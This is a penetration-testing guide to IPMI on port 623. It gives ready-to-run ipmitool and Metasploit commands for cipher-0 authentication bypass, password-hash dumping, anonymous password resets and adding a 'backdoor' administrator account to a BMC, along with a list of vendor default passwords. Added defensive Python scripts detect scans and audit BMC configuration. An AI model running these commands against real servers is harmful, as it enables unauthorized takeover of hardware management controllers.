# IPMI - Port 623/UDP/TCP

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop**](https://shop.verylazytech.com/) for e-books and courses.  📚
{% endtab %}
{% endtabs %}

## Basic info

The Intelligent Platform Management Interface (IPMI) is a standardized protocol developed by Intel in 1998 to facilitate remote management and monitoring of computer systems, regardless of their operating state. IPMI operates independently of the system's CPU, firmware, and operating system, enabling administrators to perform tasks such as system monitoring, recovery, and maintenance even when the system is powered off or unresponsive. This functionality is primarily managed through the Baseboard Management Controller (BMC), a dedicated microcontroller embedded on the motherboard.

**Default Ports:** IPMI commonly utilizes UDP port 623 for network communication, though it can also operate over TCP.


## Enumerating IPMI Services

Effective enumeration of IPMI services is crucial for identifying potential vulnerabilities. The following methodologies and tools are instrumental in this process:

### Network Scanning with Nmap

Nmap can be employed to detect active IPMI services on a network:

```bash
nmap -n -p 623 <target-subnet>
nmap -n -sU -p 623 <target-subnet>
```

The first command probes TCP port 623 and the second (`-sU`) probes UDP port 623, the port IPMI normally listens on; a host that answers on either indicates a reachable BMC.

### Identifying IPMI Version

Determining the IPMI version can provide insights into potential vulnerabilities:

```bash
nmap -sU --script ipmi-version -p 623 <target-ip>
```

Alternatively, the Metasploit auxiliary module can be utilized:

```bash
use auxiliary/scanner/ipmi/ipmi_version
```
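Seen from the defender's side, the scans above leave a recognisable trace: one source touching many hosts on port 623. The following Python script is an added example, not part of the original page; it runs over a few constructed firewall log lines (the `key=value` log format, the `10.10.5.0/24` management subnet and the sweep threshold are assumptions) and flags both non-management sources reaching port 623 and sources that touch several BMCs in a row.

```python
"""Flag IPMI (port 623) traffic from hosts outside the management network.

Added example, not from the original page. It parses constructed firewall
log lines and reports (a) any source outside the management subnet that
reached port 623 and (b) sources touching many BMCs on 623, the pattern an
nmap sweep leaves behind. Log format and subnet values are assumptions.
"""
import ipaddress
import re
from collections import defaultdict

# Constructed sample log lines in a generic key=value firewall format (assumption).
SAMPLE_LOGS = """\
2024-05-01T10:00:01Z fw action=allow proto=udp src=10.10.5.20 dst=10.10.9.11 dport=623
2024-05-01T10:00:02Z fw action=allow proto=udp src=192.168.44.7 dst=10.10.9.11 dport=623
2024-05-01T10:00:02Z fw action=allow proto=udp src=192.168.44.7 dst=10.10.9.12 dport=623
2024-05-01T10:00:03Z fw action=allow proto=tcp src=192.168.44.7 dst=10.10.9.13 dport=623
2024-05-01T10:00:03Z fw action=allow proto=udp src=192.168.44.7 dst=10.10.9.14 dport=623
2024-05-01T10:00:04Z fw action=allow proto=tcp src=192.168.44.9 dst=10.10.9.50 dport=443
"""

# Hosts permitted to talk to BMCs: the assumed management subnet.
MANAGEMENT_NET = ipaddress.ip_network("10.10.5.0/24")
IPMI_PORT = 623
SWEEP_THRESHOLD = 3  # distinct BMCs on 623 from one source before calling it a sweep

LINE_RE = re.compile(
    r"proto=(?P<proto>\w+)\s+src=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)\s+dport=(?P<dport>\d+)"
)


def parse_line(line):
    """Return (proto, src, dst, dport) or None when the line does not match."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return m["proto"], m["src"], m["dst"], int(m["dport"])


def analyse(log_text):
    """Return {'unauthorised': [(src, dst, proto), ...], 'sweeps': [src, ...]}."""
    unauthorised = []
    targets_by_src = defaultdict(set)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        proto, src, dst, dport = parsed
        if dport != IPMI_PORT:
            continue
        targets_by_src[src].add(dst)
        if ipaddress.ip_address(src) not in MANAGEMENT_NET:
            unauthorised.append((src, dst, proto))
    sweeps = sorted(s for s, t in targets_by_src.items() if len(t) >= SWEEP_THRESHOLD)
    return {"unauthorised": unauthorised, "sweeps": sweeps}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOGS)
    for src, dst, proto in result["unauthorised"]:
        print(f"ALERT non-management host {src} reached {dst}:{IPMI_PORT}/{proto}")
    for src in result["sweeps"]:
        print(f"ALERT possible IPMI sweep from {src}")
```

The same two rules translate directly into a firewall policy: only the management subnet should be able to reach port 623 at all, and a single source hitting more than a handful of BMCs on that port is worth an alert even when the policy allows it.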

## Common IPMI Vulnerabilities

Several vulnerabilities have been identified in IPMI implementations that could be exploited during penetration testing:

### Cipher 0 Authentication Bypass

A critical flaw in IPMI 2.0 involves the use of cipher suite 0, which allows authentication bypass. Attackers can exploit this by specifying cipher 0 to gain unauthorized access:

```bash
ipmitool -I lanplus -C 0 -H <target-ip> -U <username> -P <password> user list
```

This command lists user accounts without proper authentication, highlighting the severity of the vulnerability.
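An administrator can check for this exposure from the BMC's own configuration: `ipmitool lan print` reports a `Cipher Suite Priv Max` string in which position N is the maximum privilege granted to cipher suite N (`X` = unused, `c`/`u`/`o`/`a`/`O` = callback, user, operator, admin, OEM). The Python script below is an added example, not code from the page or from the ipmitool project; it parses a constructed `lan print` excerpt (the `10.10.9.11` address is a placeholder) and prints the `lan set ... cipher_privs` command with the commonly documented hardening value that marks suite 0 unused.

```python
"""Audit an `ipmitool lan print` dump for cipher suite 0 exposure.

Added example, not from the original page. Parses the 'RMCP+ Cipher Suites'
and 'Cipher Suite Priv Max' lines; in the latter, character N is the maximum
privilege for cipher suite N. Suite 0 is the 'no authentication' suite, so any
letter other than X in position 0 means it is reachable. The dump is constructed.
"""
import re

# Constructed excerpt of `ipmitool lan print 1` output from a weak configuration.
SAMPLE_LAN_PRINT = """\
Set in Progress         : Set Complete
IP Address Source       : Static Address
IP Address              : 10.10.9.11
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaaaaaaaaaaaa
                        :     X=Cipher Suite Unused
                        :     c=CALLBACK
                        :     u=USER
                        :     o=OPERATOR
                        :     a=ADMIN
                        :     O=OEM
"""

PRIV_NAMES = {"X": "unused", "c": "CALLBACK", "u": "USER",
              "o": "OPERATOR", "a": "ADMIN", "O": "OEM"}

# Commonly documented hardening value: suite 0 (and the other weak suites) set to X.
RECOMMENDED_PRIVS = "XaaaXXaaaXXaaXX"


def parse_cipher_privs(lan_print_text):
    """Return {suite_number: privilege_letter} from the Priv Max line."""
    m = re.search(r"Cipher Suite Priv Max\s*:\s*([XcuoaO]+)", lan_print_text)
    if not m:
        raise ValueError("Cipher Suite Priv Max line not found")
    return {i: ch for i, ch in enumerate(m.group(1))}


def parse_supported_suites(lan_print_text):
    """Return the list of cipher suite numbers the BMC advertises."""
    m = re.search(r"RMCP\+ Cipher Suites\s*:\s*([\d,]+)", lan_print_text)
    return [int(x) for x in m.group(1).split(",")] if m else []


def audit(lan_print_text):
    """Return a list of findings; empty when cipher 0 is not reachable."""
    privs = parse_cipher_privs(lan_print_text)
    supported = parse_supported_suites(lan_print_text)
    findings = []
    if 0 in supported and privs.get(0, "X") != "X":
        findings.append(
            f"cipher suite 0 reachable with max privilege {PRIV_NAMES[privs[0]]}"
        )
    return findings


def remediation_command(channel=1):
    """The ipmitool command that applies the hardened privilege string."""
    return f"ipmitool lan set {channel} cipher_privs {RECOMMENDED_PRIVS}"


if __name__ == "__main__":
    for finding in audit(SAMPLE_LAN_PRINT):
        print("FINDING:", finding)
        print("FIX:    ", remediation_command())
```

Run the audit again after applying the fix; the `Cipher Suite Priv Max` line should then start with `X`, and an `ipmitool ... -C 0` session should be refused by the BMC. Some BMC firmware ignores `cipher_privs` entirely, which is a finding in its own right.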

### Retrieval of Password Hashes via RAKP

The Remote Authenticated Key-Exchange Protocol (RAKP) in IPMI 2.0 contains a vulnerability that permits attackers to retrieve password hashes of valid users. These hashes can then be subjected to offline brute-force attacks to recover plaintext passwords. Metasploit provides a module to exploit this vulnerability:

```bash
use auxiliary/scanner/ipmi/ipmi_dumphashes
```

Successful execution retrieves hashed credentials, emphasizing the need for robust password policies.

### Anonymous Authentication

Some IPMI implementations allow anonymous authentication with null usernames and passwords. This misconfiguration can be exploited to perform unauthorized actions, such as resetting user passwords:

```bash
ipmitool -I lanplus -H <target-ip> -U '' -P '' user set password <user-id> <new-password>
```

This command resets the password for the specified user ID without proper authentication.

### Clear-Text Password Storage in Supermicro BMCs

Supermicro's IPMI implementation has been found to store administrator credentials in clear text within the BMC's filesystem, specifically in files like `/nv/PSBlock`. Attackers with access to the BMC can retrieve these credentials:

```bash
cat /nv/PSBlock
```

This practice poses significant security risks and underscores the importance of securing BMC access.

## Brute Force <a href="#brute-force" id="brute-force"></a>

**HP randomizes the default password** for its **Integrated Lights Out (iLO)** product during manufacture. This practice contrasts with other manufacturers, who tend to use **static default credentials**. A summary of default usernames and passwords for various products is provided as follows:

* **HP Integrated Lights Out (iLO)** uses a **factory randomized 8-character string** as its default password, a stronger default than the static credentials listed below.
* Products like **Dell's iDRAC, IBM's IMM**, and **Fujitsu's Integrated Remote Management Controller** use easily guessable passwords such as "calvin", "PASSW0RD" (with a zero), and "admin" respectively.
* Similarly, **Supermicro IPMI (2.0), Oracle/Sun ILOM**, and **ASUS iKVM BMC** also use simple default credentials, with "ADMIN", "changeme", and "admin" serving as their passwords.

## Introducing Backdoors into BMC from the Host <a href="#introducing-backdoors-into-bmc-from-the-host" id="introducing-backdoors-into-bmc-from-the-host"></a>

Upon compromising a host equipped with a BMC, the **local BMC interface can be leveraged to insert a backdoor user account**, creating a lasting presence on the server. This attack necessitates the presence of **`ipmitool`** on the compromised host and the activation of BMC driver support. The following commands illustrate how a new user account can be injected into the BMC using the host's local interface, which bypasses the need for authentication. This technique is applicable to a wide range of operating systems including Linux, Windows, BSD, and even DOS.

```bash
ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)

ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)
4  backdoor        true    false      true      ADMINISTRATOR
```
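The account injected above is visible in the same `ipmitool user list` table, so a periodic audit of that table catches it. The Python script below is an added example, not code from the page; it parses a constructed user table in ipmitool's format and flags any ADMINISTRATOR-level account that is not on a per-host allowlist, plus any nameless (null) user that can send IPMI messages, which is the misconfiguration behind the anonymous-authentication section above. The allowlist `{"ADMIN"}` is an assumption.

```python
"""Audit `ipmitool user list` output for accounts that should not be there.

Added example, not from the original page. It parses the user table ipmitool
prints and flags (a) any ADMINISTRATOR account not in a per-host allowlist
and (b) any nameless (null) user allowed to send IPMI messages. The sample
table and the allowlist are constructed for this demo.
"""
import re

# Constructed sample: a BMC where user 4 was added through the host-side interface
# and the null user (ID 1) was left enabled for IPMI messaging.
SAMPLE_USER_LIST = """\
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      true       ADMINISTRATOR
2   ADMIN            true    false      true       ADMINISTRATOR
3   root             true    false      false      Unknown (0x00)
4   backdoor         true    false      true       ADMINISTRATOR
"""

# Accounts expected to hold ADMINISTRATOR on this BMC (assumption).
EXPECTED_ADMINS = {"ADMIN"}

# One table row; the name field may be empty, which the regex tolerates via \S*.
ROW_RE = re.compile(
    r"^\s*(?P<uid>\d+)\s+(?P<name>\S*)\s+(?P<callin>true|false)\s+"
    r"(?P<link>true|false)\s+(?P<msg>true|false)\s+(?P<priv>.+?)\s*$"
)


def parse_user_list(text):
    """Return a list of dicts, one per user row; header and blank lines are skipped."""
    users = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        users.append({
            "id": int(m["uid"]),
            "name": m["name"],
            "ipmi_msg": m["msg"] == "true",
            "priv": m["priv"],
        })
    return users


def audit_users(text, expected_admins=EXPECTED_ADMINS):
    """Return human-readable findings for unexpected or null privileged users."""
    findings = []
    for u in parse_user_list(text):
        if u["name"] == "" and u["ipmi_msg"]:
            findings.append(
                f"user {u['id']}: null user can send IPMI messages ({u['priv']})"
            )
        elif u["priv"] == "ADMINISTRATOR" and u["name"] not in expected_admins:
            findings.append(
                f"user {u['id']}: unexpected ADMINISTRATOR account '{u['name']}'"
            )
    return findings


if __name__ == "__main__":
    for finding in audit_users(SAMPLE_USER_LIST):
        print("FINDING:", finding)
```

Feed it the real output of `ipmitool user list` on each channel and diff the findings against the previous run; a newly appearing ADMINISTRATOR account on a BMC whose host was recently compromised is exactly the persistence described above. An unexpected account can be neutralised with `ipmitool user disable <id>` before the password is rotated and the host is investigated.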
